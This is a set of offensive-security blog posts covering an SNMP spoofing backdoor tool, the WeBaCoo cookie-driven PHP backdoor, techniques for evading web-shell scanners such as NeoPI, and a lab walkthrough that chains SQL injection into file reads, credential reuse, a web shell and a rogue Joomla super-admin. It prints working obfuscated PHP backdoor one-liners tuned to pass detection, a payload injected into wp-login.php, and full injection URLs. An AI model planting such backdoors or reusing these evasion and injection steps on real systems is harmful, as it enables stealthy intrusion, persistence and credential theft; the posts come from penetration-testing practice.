SNMP (Simple Network Management Protocol) is a UDP based protocol used mainly for monitor purposes. Its connectionless UDP nature makes SNMP exposed to IP source spoofing attacks. Although, this does not seem to concern network and system administrators as my pen-test cases reveal. The reason that usually (although wrongly) admins do not bother to secure their agents is the read-only behavior. While SNMP offers both read (get info) and write (set configuration variables) under most infrastructures only the read behavior is implemented serving monitor purposes. This creates a belief to admins that there are not any undergoing security risks shifting the problem to anti-spoofing mechanisms.

While messing around with SNMP functionalities the idea for developing SNMP-BCC was born as a PoC to the above wrong approach of the SNMP setups. SNMP-BCC is capable to create a stealth backdoor communication channel with an “owned” host using an SNMP agent as a relay. Initially the desired to sent data are packed following the ASN.1 OID prototype in an SNMP GetRequest packet. Then the source IP address of the UDP packet is altered to the end client’s IP address. This source spoofed packet is transmitted to the public SNMP agent (community string must be known). Of course the SNMP agent can not locate this invalid OID and replies with an error response for the given OID. This error response containing the unattached initial packed data is finally transferred to the end host. Then the client with the relevant decoder can parse the data.

SNMP-BCC is mainly a post exploitation tool that a pen-tester can use to establish a stealth and hard to detect communication channel with a compromised host. Despite the backdoor communcation purposes someone can use the tool for data leakage and node pivoting purposes. While writing this post, the whole project is in its early stage and I haven’t yet decided if it is worth continuing and if so the working model. Although, I developed and made public SNMP-BCC in order to have feedback from my colleagues and infosec community for the next steps.

SNMP-BCC is written in perl using the raw-sockets library and is available at Github under GPLv3 license. Using ‘snmpbcc.pl’ users can create spoofed SNMP packets with system commands under a user interactive pseudo shell mode. For testing purposes the project also includes the ‘backdoor.pl‘ file that serves as a listener in the end host client. I haven’t implemented a fully ASN.1 decoder at the backdoor code, that’s why the command is wrapped with some special characters (‘#$#’) in order to be easily obtained from the response message.

You can get the latest version of the tool by cloning the repository

git clone git://github.com/anestisb/SNMP-BCC.git

Or by directly downloading the zip project archive

https://github.com/anestisb/SNMP-BCC/zipball/master

Here is a screenshot with SNMP-BCC in action:

Your comments are greatly appreciated for tool’s evolution.

A. Bechtsoudis

I mentioned NeoPI in one of my previous posts about web backdoor detection, although till recently I haven’t realized how useful it can prove under certain circumstances. The tool has five testing categories:

1. Entropy: Measure file’s uncertainty associated with the ascii charset (more info)
2. Longest Word: Large strings might form encrypted/obfuscated code
3. Index of Coincidence: Low IC indicates potential encryption/obfuscation (more info)
4. Signature: Search files for “dangerous” strings
5. Compression: Compare files’ compression ratio (more info)

To examine NeoPI’s results in a real setup, I established a web server debian VM with 3 CMS installations (Joomla, WordPress and Coppermine). Under the web root path I have placed two WeBaCoo’s generated files: webacoo.php (base64 obfuscated) and webacoo_raw.php (raw php code).

In order to make results more accurate, the file extension regular expression feature was used to search only for server side PHP files. The initial scan report for all the tests under the webroot path is as follow:

[[ Total files scanned: 10235 ]]
[[ Total files ignored: 0 ]]
[[ Scan Time: 48.170000 seconds ]]
 
[[ Top 10 entropic files for a given search ]]
  6.1817		/var/www/gallery/lang/chinese_gb.php
  6.1784		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/zh-cn.php
  6.1710		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/zh-tw.php
  5.8753		/var/www/blog/wp-admin/js/revisions-js.php
  5.7846		/var/www/gallery/lang/japanese.php
  5.7306		/var/www/webacoo.php
  5.6484		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/cs.php
  5.6296		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/sk.php
  5.6203		/var/www/plugins/system/nonumberelements/helper.php
  5.6133		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/pl.php
 
[[ Top 10 longest word files ]]
     745		/var/www/gallery/include/exif_php.inc.php
     745		/var/www/gallery/exifmgr.php
     741		/var/www/gallery/lang/japanese.php
     728		/var/www/blog/wp-admin/js/revisions-js.php
     522		/var/www/blog/wp-includes/functions.php
     516		/var/www/libraries/tcpdf/tcpdf.php
     474		/var/www/plugins/content/jw_allvideos/includes/sources.php
     456		/var/www/blog/wp-content/plugins/sexybookmarks/includes/html-helpers.php
     436		/var/www/gallery/lang/chinese_gb.php
     354		/var/www/blog/wp-includes/class-simplepie.php
 
[[ Average IC for Search ]]
0.0372679517799
 
[[ Top 10 lowest IC files ]]
  0.0198		/var/www/webacoo.php
  0.0206		/var/www/gallery/lang/chinese_gb.php
  0.0217		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/zh-tw.php
  0.0217		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/zh-cn.php
  0.0217		/var/www/templates/system/index.php
  0.0217		/var/www/administrator/templates/system/index.php
  0.0222		/var/www/blog/wp-content/themes/lightword/alternatives/404.php
  0.0226		/var/www/blog/wp-admin/js/revisions-js.php
  0.0270		/var/www/includes/HTML_toolbar.php
  0.0272		/var/www/templates/beez/html/com_user/reset/complete.php
 
[[ Top 10 signature match counts ]]
      43		/var/www/gallery/include/themes.inc.php
      43		/var/www/gallery/themes/sample/theme.php
      26		/var/www/blog/wp-admin/includes/class-ftp.php
      19		/var/www/blog/wp-content/plugins/nextgen-gallery/lib/imagemagick.inc.php
      14		/var/www/libraries/geshi/geshi/php.php
      13		/var/www/blog/wp-includes/Text/Diff/Engine/native.php
      10		/var/www/blog/wp-includes/js/tinymce/plugins/spellchecker/classes/PSpellShell.php
       9		/var/www/gallery/include/functions.inc.php
       8		/var/www/blog/wp-includes/js/tinymce/plugins/spellchecker/config.php
       8		/var/www/blog/wp-admin/includes/class-wp-filesystem-ssh2.php
 
[[ Top 10 compression match counts ]]
  1.0704		/var/www/administrator/templates/system/index.php
  1.0704		/var/www/templates/system/index.php
  1.0000		/var/www/blog/wp-content/plugins/sexybookmarks/includes/index.php
  1.0000		/var/www/blog/wp-content/plugins/sexybookmarks/js/index.php
  0.9663		/var/www/blog/wp-content/themes/lightword/alternatives/404.php
  0.8958		/var/www/includes/mambo.php
  0.8860		/var/www/includes/joomla.php
  0.8821		/var/www/includes/vcard.class.php
  0.8818		/var/www/includes/PEAR/PEAR.php
  0.8796		/var/www/includes/HTML_toolbar.php
 
[[ Top cumulative ranked files ]]
     122		/var/www/webacoo.php
     202		/var/www/blog/wp-admin/js/revisions-js.php
     528		/var/www/plugins/content/jw_allvideos/includes/elements/header.php
     912		/var/www/plugins/content/jw_allvideos/includes/helper.php
     984		/var/www/modules/mod_archive/helper.php
    1100		/var/www/libraries/bitfolge/vcard.php
    1210		/var/www/administrator/components/com_content/elements/article.php
    1240		/var/www/gallery/addfav.php
    1246		/var/www/administrator/components/com_installer/admin.installer.php
    1258		/var/www/administrator/components/com_config/views/component/view.php

While webacoo_raw.php successfully passed the tests, obfuscated code (webacoo.php) didn’t have the same luck. Entropy and Index of Coincidence tests have the highest scores, marking the tool as a possible malicous file. Despite these two scores, the obfuscated code has a high score at the longest word test too, but it is not observable in the lab setup because of the CMS long string matching and validating features.

These high scores are due to base64 encoding payload string. In order to bypass them, the generated code must implement some new features to trick these tests. My first thought was to split the encoded data into smaller chunks which are finally concatenated to form the overall payload. Although, after some tests this proved insufficient to bypass IC and Entropy tests. A second approach is to insert some spaces into the encoded data (space is not a valid base64 character) and delete them with a replace function before decode the data.

The question now is: After how many characters will a new space be inserted in order to have the best result? Trying to find the most efficient value, I created various code files with different group sizes (after 1,5,10,20 characters) between spaces and run NeoPI to compare the results.

[[ Total files scanned: 30 ]]
[[ Total files ignored: 0 ]]
[[ Scan Time: 0.010000 seconds ]]
 
[[ Top 10 entropic files for a given search ]]
  5.7646		/var/www/pwn/webacoo_new20.php
  5.7306		/var/www/pwn/webacoo.php
  5.6999		/var/www/pwn/webacoo_new10.php
  5.5322		/var/www/pwn/webacoo_new5.php
  5.1328		/var/www/pwn/webacoo_raw.php
  4.2037		/var/www/pwn/webacoo_new1.php
 
[[ Top 10 longest word files ]]
     295		/var/www/pwn/webacoo.php
      94		/var/www/pwn/webacoo_raw.php
      51		/var/www/pwn/webacoo_new1.php
      51		/var/www/pwn/webacoo_new10.php
      51		/var/www/pwn/webacoo_new5.php
      51		/var/www/pwn/webacoo_new20.php
 
[[ Average IC for Search ]]
0.040872937004
 
[[ Top 10 lowest IC files ]]
  0.0194		/var/www/pwn/webacoo_new20.php
  0.0198		/var/www/pwn/webacoo.php
  0.0224		/var/www/pwn/webacoo_new10.php
  0.0301		/var/www/pwn/webacoo_raw.php
  0.0338		/var/www/pwn/webacoo_new5.php
  0.2009		/var/www/pwn/webacoo_new1.php
 
[[ Top 10 signature match counts ]]
       1		/var/www/pwn/webacoo.php
       1		/var/www/pwn/webacoo_raw.php
       1		/var/www/pwn/webacoo_new1.php
       1		/var/www/pwn/webacoo_new10.php
       1		/var/www/pwn/webacoo_new5.php
       1		/var/www/pwn/webacoo_new20.php
 
[[ Top 10 compression match counts ]]
  0.8114		/var/www/pwn/webacoo_new10.php
  0.8101		/var/www/pwn/webacoo_new20.php
  0.7993		/var/www/pwn/webacoo.php
  0.7947		/var/www/pwn/webacoo_new5.php
  0.7593		/var/www/pwn/webacoo_raw.php
  0.5407		/var/www/pwn/webacoo_new1.php
 
[[ Top cumulative ranked files ]]
       8		/var/www/pwn/webacoo_new20.php
       9		/var/www/pwn/webacoo.php
      11		/var/www/pwn/webacoo_new10.php
      17		/var/www/pwn/webacoo_new5.php
      17		/var/www/pwn/webacoo_raw.php
      22		/var/www/pwn/webacoo_new1.php

webacoo_new20.php (insert space after 20 characters) has the worst behavior (even worse than the original webacoo.php with no spaces inserted). On the other hand webacoo_new1.php (space after each character) has the lowest score in every partial test, making it the most efficient choice (even better from the raw code).

Consequently, the new final backdoor file that is capable to pass undetected from NeoPI is as follow:

<?php $b=strrev("edoced_4"."6esab");eval($b(str_replace(" ","","a W Y o a X N z Z X Q o J F 9 D T 0 9 L S U V b J 2 N t J 1 0 p K X t v Y l 9 z d G F y d C g p O 3 N 5 c 3 R l b S h i Y X N l N j R f Z G V j b 2 R l K C R f Q 0 9 P S 0 l F W y d j b S d d K S 4 n I D I + J j E n K T t z Z X R j b 2 9 r a W U o J F 9 D T 0 9 L S U V b J 2 N u J 1 0 s J F 9 D T 0 9 L S U V b J 2 N w J 1 0 u Y m F z Z T Y 0 X 2 V u Y 2 9 k Z S h v Y l 9 n Z X R f Y 2 9 u d G V u d H M o K S k u J F 9 D T 0 9 L S U V b J 2 N w J 1 0 p O 2 9 i X 2 V u Z F 9 j b G V h b i g p O 3 0 = "))); ?>

[[ Total files scanned: 10230 ]]
[[ Total files ignored: 0 ]]
[[ Scan Time: 46.120000 seconds ]]
 
[[ Top 10 entropic files for a given search ]]
  6.1817		/var/www/gallery/lang/chinese_gb.php
  6.1784		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/zh-cn.php
  6.1710		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/zh-tw.php
  5.8753		/var/www/blog/wp-admin/js/revisions-js.php
  5.7846		/var/www/gallery/lang/japanese.php
  5.6484		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/cs.php
  5.6296		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/sk.php
  5.6203		/var/www/plugins/system/nonumberelements/helper.php
  5.6133		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/pl.php
  5.6060		/var/www/blog/wp-config.php
 
[[ Top 10 longest word files ]]
     745		/var/www/gallery/include/exif_php.inc.php
     745		/var/www/gallery/exifmgr.php
     741		/var/www/gallery/lang/japanese.php
     728		/var/www/blog/wp-admin/js/revisions-js.php
     522		/var/www/blog/wp-includes/functions.php
     516		/var/www/libraries/tcpdf/tcpdf.php
     474		/var/www/plugins/content/jw_allvideos/includes/sources.php
     456		/var/www/blog/wp-content/plugins/sexybookmarks/includes/html-helpers.php
     436		/var/www/gallery/lang/chinese_gb.php
     354		/var/www/blog/wp-includes/class-simplepie.php
 
[[ Average IC for Search ]]
0.0372700176166
 
[[ Top 10 lowest IC files ]]
  0.0206		/var/www/gallery/lang/chinese_gb.php
  0.0217		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/zh-tw.php
  0.0217		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/zh-cn.php
  0.0217		/var/www/templates/system/index.php
  0.0217		/var/www/administrator/templates/system/index.php
  0.0222		/var/www/blog/wp-content/themes/lightword/alternatives/404.php
  0.0226		/var/www/blog/wp-admin/js/revisions-js.php
  0.0270		/var/www/includes/HTML_toolbar.php
  0.0272		/var/www/templates/beez/html/com_user/reset/complete.php
  0.0273		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/cs.php
 
[[ Top 10 signature match counts ]]
      43		/var/www/gallery/include/themes.inc.php
      43		/var/www/gallery/themes/sample/theme.php
      26		/var/www/blog/wp-admin/includes/class-ftp.php
      19		/var/www/blog/wp-content/plugins/nextgen-gallery/lib/imagemagick.inc.php
      14		/var/www/libraries/geshi/geshi/php.php
      13		/var/www/blog/wp-includes/Text/Diff/Engine/native.php
      10		/var/www/blog/wp-includes/js/tinymce/plugins/spellchecker/classes/PSpellShell.php
       9		/var/www/gallery/include/functions.inc.php
       8		/var/www/blog/wp-includes/js/tinymce/plugins/spellchecker/config.php
       8		/var/www/blog/wp-admin/includes/class-wp-filesystem-ssh2.php
 
[[ Top 10 compression match counts ]]
  1.0704		/var/www/administrator/templates/system/index.php
  1.0704		/var/www/templates/system/index.php
  1.0000		/var/www/blog/wp-content/plugins/sexybookmarks/includes/index.php
  1.0000		/var/www/blog/wp-content/plugins/sexybookmarks/js/index.php
  0.9663		/var/www/blog/wp-content/themes/lightword/alternatives/404.php
  0.8958		/var/www/includes/mambo.php
  0.8860		/var/www/includes/joomla.php
  0.8821		/var/www/includes/vcard.class.php
  0.8818		/var/www/includes/PEAR/PEAR.php
  0.8796		/var/www/includes/HTML_toolbar.php
 
[[ Top cumulative ranked files ]]
     199		/var/www/blog/wp-admin/js/revisions-js.php
     521		/var/www/plugins/content/jw_allvideos/includes/elements/header.php
     907		/var/www/plugins/content/jw_allvideos/includes/helper.php
     977		/var/www/modules/mod_archive/helper.php
    1094		/var/www/libraries/bitfolge/vcard.php
    1203		/var/www/administrator/components/com_content/elements/article.php
    1233		/var/www/gallery/addfav.php
    1240		/var/www/administrator/components/com_installer/admin.installer.php
    1252		/var/www/administrator/components/com_config/views/component/view.php
    1264		/var/www/xmlrpc/includes/framework.php

This new technique to bypass statistical detection methods will be implemented in WeBaCoo’s next release.

A. Bechtsoudis

A list of tools and scripts that marked as “threat” WeBaCoo’s generated code based on the base64 decoder use, is as following (check the first image gallery at the end of the post for report screenshots):

• Linux Malware Detect (website)
• PHP Shell Scanner (website)
• Virus Total (only ESET mark it as threat)
• Look for bad guys script (website)

After inspecting how the above tools work, I thought two main methods that can be used to trick the base64 encoder content matching rules: string reversing and string splitting. These two methods can be combined to create more tricky code, always taking into account the least possible character use. WeBaCoo generates PHP backdoor code, so I will work these methods under PHP. Although the same concept can be applied to other languages too.

String Reversing

Lucky for us PHP provides the strrev() function in order to easily reverse a string. Knowing that base64_decoder was the function name that triggered the above tools, strrev can be used to trick them. Let’s form an example to see that our concept works before proceeding to backdoor alterations.

<?php
//base64 encode of "show me your code"
$data="c2hvdyBtZSB5b3VyIGNvZGU=";
 
//$bd="base64_decode"
$bd=strrev("edoced_46esab");
 
//print decoded data
//eval is used to evaluate string as PHP code
eval("echo \$bd(\$data);");
?>

String Splitting

The concept behind this technique is to split the trigger string (“base64_decode”) into smaller chunks, that can be later concatenated to form the function name.

<?php
//base64 encode of "show me your code"
$data="c2hvdyBtZSB5b3VyIGNvZGU=";
 
//split into two chunks
$ac="base6";
$bc="4_decode";
 
//concat the chunks
$cc=$ac.$bc;
 
//print decoded data
//eval is used to evaluate string as PHP code
eval("echo \$cc(\$data);");
?>

Knowing that the above two techniques work against decoder’s string name detection, they can be combined to form the desired functionality. The following PHP code is a short example of such a combination that is used in the new backdoor code. I will conduct the same tests to see if the new backdoor code successfully passes all of them. You can see the results in the second image gallery at the end of the post.

<?php $c=strrev("edoced_4"."6esab");eval($c("aWYoaXNzZXQoJF9DT09LSUVbJ2NtJ10pKXtvYl9zdGFydCgpO3N5c3RlbShiYXNlNjRfZGVjb2RlKCRfQ09PS0lFWydjbSddKS4nIDI+JjEnKTtzZXRjb29raWUoJF9DT09LSUVbJ2NuJ10sJF9DT09LSUVbJ2NwJ10uYmFzZTY0X2VuY29kZShvYl9nZXRfY29udGVudHMoKSkuJF9DT09LSUVbJ2NwJ10pO29iX2VuZF9jbGVhbigpO30=")); ?>

These two techniques will be implemented in WeBaCoo’s next release after I conclude to the more efficient ways of use.

Initial Code Report Results

New Code Report Results

 
DISCLAIMER: I’m not responsible with what you do with this info. This information is for educational purposes only.
 

A. Bechtsoudis

The general concept is pretty simple. Initially the backdoor PHP code is generated using payloads containing main PHP system functions that operate under a basic Cookie handling mechanism. After the code injection the client can send shell commands hidden in Cookie headers obfuscated with base64 encoding. On the server side the shell command is executed and the output is transmitted back to client hidden (base64 encoded too) in Cookie headers.

WeBaCoo is written in perl and is available at github. Clone the repository:

git clone git://github.com/anestisb/WeBaCoo.git

Or download the latest version from:

http://bechtsoudis.com/data/tools/webacoo-latest.tar.gz

Let’s see two case studies in order to present WeBaCoo‘s functionalities. I will use a local burp proxy (127.0.0.1:8080) to inspect the HTTP header cookies.

1. Simple case

The first scenario involves the addition of a new PHP file with the obfuscated backdoor code in the webroot path. After the addition the client can use the termninal mode to execute commands to the server.

Initially let’s create the backdoor file using the ‘shell_exec’ system function:

Then I upload the backdoor.php in the victim server and start a “terminal” connection:

And the relative request and response recorded from burp are seen in the following screen-shots:

2. Complex case – backdooring wordpress login

WordPress familiar users know that before the login process, the server creates a Test-cookie to examine if broswer has cookies enabled. After that test cookie set I will inject the backdoor code unobfuscated. I create the PHP payload using the ‘passthru’ function and the -r (raw output) flag to get the un-obfuscated code.

Then the malicious code is injected under the Test-Cookie set. So the wp-login.php is as follow (only the crucial lines are included):

//Set a cookie now to see if they are supported by the browser.
setcookie(TEST_COOKIE, 'WP Cookie check', 0, COOKIEPATH, COOKIE_DOMAIN);
if ( SITECOOKIEPATH != COOKIEPATH )
        setcookie(TEST_COOKIE, 'WP Cookie check', 0, SITECOOKIEPATH, COOKIE_DOMAIN);
 
//My payload
if(isset($_COOKIE['cm'])){ob_start();passthru(base64_decode($_COOKIE['cm']).' 2>&1');setcookie($_COOKIE['cn'],$_COOKIE['cp'].base64_encode(ob_get_contents()).$_COOKIE['cp'], 0, SITECOOKIEPATH, COOKIE_DOMAIN);ob_end_clean();}
 
// allow plugins to override the default actions, and to add extra actions if they want
do_action( 'login_init' );
do_action( 'login_form_' . $action );

After the injection I establish a “terminal” connection to the infected server to execute my commands:

And the relative request and response recorded from burp:

As you can see the communication data are pretty stealth and will not trigger regular application firewalls and IDS/IPS setups. Although, I will appreciate your feedeback from various tests under your setups to evaluate and evolve WeBaCoo functionalities.

A. Bechtsoudis

With this article i aim to highlight the importance of global security procedures in shared web services. Administrators must secure the web services both individually (updates, patches etc) and globally by applying formal and strict access procedures. As a proof of my concept i will present a multi-stage web hacking scenario in which the attacker finds an application specific vulnerability as a start point and exploit all the web services taking advantage of mis-configurations and security flaws.

Before proceeding to the attack phase, we must setup a web server testbed hosting some vulnerable web applications. Luckily for us, there exist the OWASP Broken Web Applications project, an Ubuntu 10.4 VMWare image containing a collection of popular vulnerable web applications.

Let’s begin our attack procedure targeting the WordPress installation. WPScan tool will help us to easily discover possible vulnerabilities based on the sources’ (core and plugins) version numbers.

WPScan discovered 2 vulnerable plugins based on their version and indicated the relative PoC exploits from the exploit-db. Let’s give a try to the Spreadsheet plugin exploit using the exploit-db PoC injection url:

http://192.168.27.135/wordpress/wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4+from+wp_users--&display=plain

A regular attack/pen-test will continue with a password recovery tool (like John The Ripper, OCL Hashcat etc) in order to obtain the admin credentials. Although, we are going to follow a different approach using MySQL load_file() function to read system files and configurations in order to find a way to upload a php shell. Some of you may think that we can use the into outfile/dumpfile feature, but we actually can’t because we can’t bypass the single/double quote sanitization.

In order to use the load_file(), DB user must have FILE privileges. Before proceeding to the DB user privilege escalation, we need to know the exact username. The DB username can be obtained using MySQL’s user() function.

So the new injection url is:

http://192.168.27.135/wordpress/wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1,user(),3,4--&display=plain

Now that we know the DB username we can check whether the user has the FILE privileges by quering the mysql.user table. To bypass the quote escaping we use hex values  (‘wordpress’ -> 0x776f72647072657373).

http://192.168.27.135/wordpress/wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat(user,0x3a,file_priv),3,4+from+mysql.user+where+user=0x776f72647072657373--&display=plain

The “Y” value inform us that we can successfully use the load_file() function to read system files. We begin the system inspection by initially reading the “/etc/passwd” file (always using hex values for strings):

http://192.168.27.135/wordpress/wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+%281=0%29+union+select+1,load_file%280x2f6574632f706173737764%29,3,4--&display=plain

We see that apart from the root user there exist a regular user in the system. Knowing that the system is a webserver our next step is to check for apache’s userdir module:

Lucky for us mod_userdir is enabled and the user’s public_html exists. The next step is to check whether php engine is enabled in the public_html dir. To confirm that, we need to read the php5 module configuration “/etc/apache2/mods-enabled/php5.conf”:

http://192.168.27.135/wordpress/wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+%281=0%29+union+select+1,load_file%280x2f6574632f617061636865322f6d6f64732d656e61626c65642f706870352e636f6e66%29,3,4--&display=plain

PHP engine off setting is commented meaning that PHP is allowed in the public_html dir.

Having that knowledge let’s dig into the public_html files starting from the index:

We see that the user’s public_html is hosting osFileManager, an open source php script for file management. Visiting the script’s official website and digging into the project sources, we can see that the configuration settings are placed in the index.php file. Additionally by reading the user.sql file we can see that the platform has two default usernames “admin” and “root”.

So let’s use again the load_file() to read the ~user/index.php content:

We can clearly see the DB credentials so our first guess is that the user might use the same password both for the DB and the login. Combining the two default usernames with the DB credentials we can form the following pairs of usernames – passwords:

• osfadmin – osfadm1n
• root – osfadm1n
• admin – osfadm1n

By trying all of the them we discover that the last pair give us a successful login to the file manager. Having admin access to the platform we can upload our php backdoor.

I used the weevely tool to create a simple php backdoor shell and uploaded it to the user’s upload folder (./upload).

Now that we have established a web shell we will continue our attack targeting the joomla installation. So initially let’s read the joomla configuration file:

Having the joomla’s DB credentials let’s make a new user insert with super admin privilleges. The sql file for the new user creation is uploaded to the user’s public_html dir using the osFileManager upload. The new.sql creates a new super admins with “admin2″ as username and password:

INSERT INTO `jos_users`
   (`id`, `name`, `username`, `password`, `usertype`, `gid`, `params`)
VALUES (LAST_INSERT_ID(), 'Administrator2', 'admin2',
    '42b833b7471b606fb367335f1f819db3:pBpxoos7cFwtadEoPpf3wcFMtDhccRen',
    'Super Administrator', 25, '');
INSERT INTO `jos_core_acl_aro`
VALUES (NULL, 'users', LAST_INSERT_ID(), 0, 'Administrator2', 0);
INSERT INTO `jos_core_acl_groups_aro_map`
VALUES (25, '', LAST_INSERT_ID());

At last we use the mysql command line tool in the web shell to make the DB updates:

Now we can login to the joomla’s administrator page using the credentials “admin2″-”admin2″, having full access to all the content. In a similar way we can get admin access to all the other web services.

In the above web hacking scenario, acting as a blackhat, we attacked the web server using an SQL injection as an entry point and then pivot through a series of security flaws to exploit all the web services. Hackers follow such a combinational way of thinking, exploiting and using every vulnerability or security flaw they can discover. System and web administrators must follow the same approach in order to effectively secure their systems and networks. They must quash services that are not necessary (in our case the user’s PHP file manager) and offer as secure as possible ways of access to the services for the users.

DISCLAIMER:I’m not responsible with what you do with this info. This information is for educational purposes only.

A. Bechtsoudis